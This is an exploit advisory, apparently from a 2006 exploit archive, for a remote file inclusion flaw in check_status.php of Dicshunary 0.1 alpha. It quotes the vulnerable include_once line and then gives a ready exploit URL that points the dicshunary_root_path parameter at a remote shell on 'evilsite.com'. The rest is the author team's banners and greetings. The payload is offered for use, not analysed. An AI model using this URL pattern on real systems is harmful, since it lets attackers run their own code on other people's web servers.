[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Dicshunary 0.1a (check_status.php) Remote File Include Vulnerability
# Published : 2006-11-17
# Author : DeltahackingTEAM
# Previous Title : LDU <= 8.x (polls.php) Remote SQL Injection Vulnerability
# Next Title : Kubix <= 0.7 Multiple Remote Vulnerabilities Exploit
**********************************************************************************************************
WwW.Deltahacking.NeT (Priv8 Site)
WwW.Deltahacking.Ir (Public Site)
**********************************************************************************************************
* Portal Name :dicshunary 0.1 alpha
* Class = Remote File Inclusion ;
* Download =http://puzzle.dl.sourceforge.net/sourceforge/dicshunary/dicshunary_0.1alpha.tar.gz
* Found by = DeltahackingTEAM
* User In Delta Team (TAnha & Dr.Pantagon )
--------------------------------------------------------------------------------------------
--------------
- Vulnerable Code
include_once($dicshunary_root_path.'common.inc');
++++++++++++++++++++++++++++++++++++++++++++
- Exploit:
http://[target]/[path]/check_status.php?dicshunary_root_path=http://evilsite.com/shell?
--------------------------------------------------------------------------------------------
--------------
SP TNX : Tanha, Dr.Trojan , Hiv++ , D_7j ,Vpc,
**********************************************************************************************************
# www.Syue.com [2006-11-17]